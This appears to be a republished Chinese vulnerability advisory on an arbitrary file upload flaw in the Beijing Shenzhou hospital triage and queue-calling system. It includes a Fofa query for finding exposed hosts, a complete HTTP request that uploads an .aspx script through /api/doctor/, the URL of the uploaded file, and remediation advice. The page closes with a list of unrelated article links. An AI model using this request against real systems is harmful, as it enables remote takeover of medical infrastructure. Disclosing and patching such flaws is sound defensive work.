当前位置: 首页 > news >正文

北京神州分诊叫号系统 doctor 任意文件上传漏洞

0x01 产品描述:

        ‌北京神州视翰科技有限公司的分诊叫号后台系统‌是一个集成了多种功能的综合管理系统,旨在提升医疗机构的分诊和叫号效率,优化患者就医体验。
0x02 漏洞描述:

        北京神州分诊叫号系统在/doctor接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。
0x03 搜索语句:

Fofa:title="分诊叫号后台"


0x04 漏洞复现:

POST /api/doctor/ HTTP/1.1
Host: your-ip
Content-Length: 756
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: need_login=
Connection: close------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="doctorid"0
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="login_id"001.aspx
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="name"22
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="title"23
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="department"24
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="description"------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="icon"; filename="11.txt"
Content-Type: text/aspx<%@ Page Language="C#"%><% Response.Write(123);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
------WebKitFormBoundaryKZ5OA1LLddPA4mKc--

拼接访问路径:

http://your-ip/Web/images/001.aspx


0x05 修复建议:

        首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。


http://www.mrgr.cn/news/62538.html

相关文章:

  • windows从0开始配置llamafactory微调chatglm3-6b
  • QT c++ 按钮 样式 设置按下和松开的背景颜色
  • 【HarmonyOS NEXT】鸿蒙应用实现屏幕录制详解和源码
  • GPU算力平台的应用之任意门:任意穿搭匹配模型的应用教程
  • 2025-01-06 Unity 使用 Tip2 —— Windows、Android、WebGL 打包记录
  • Nginx 解析漏洞复现
  • 最新AI绘画ComfyUI整合包又更新了!
  • 【天线&空中农业】蜜蜂检测系统源码&数据集全套:改进yolo11-ASF
  • go-logger v0.27.0 - 并发性能为官方库 10 倍
  • echarts 实现3D饼状图 加 label标签显示
  • 编程知识概览
  • C#核心(5)构造,析构,垃圾回收
  • 一文说清什么是数据要素
  • 如何使用weditor定位iphone手机的控件?
  • 基于Openwrt系统架构,实现应用与驱动的实例。
  • SpringBoot旋律线:Web音乐网站构建
  • 界面控件DevExpress WPF中文教程:Data Grid——卡片视图概述
  • 比微软的GraphRag更加强大的LightRAG:简单快速的检索增强生成
  • Java 的并发工具类与性能优化(22/30)
  • ubuntu20.04 加固方案-设置用户缺省UMASK
  • 计组-流水线吞吐率、加速比、效率计算
  • 数据不一致
  • Java爬虫:在1688上“拍立淘”——按图搜索商品的奇妙之旅
  • AdaBoost与前向分步算法 10-16最小化指数损失函数 公式解析
  • react-路由
  • K8S自建企业私有云方案 单台起配 NVMe全闪存储性能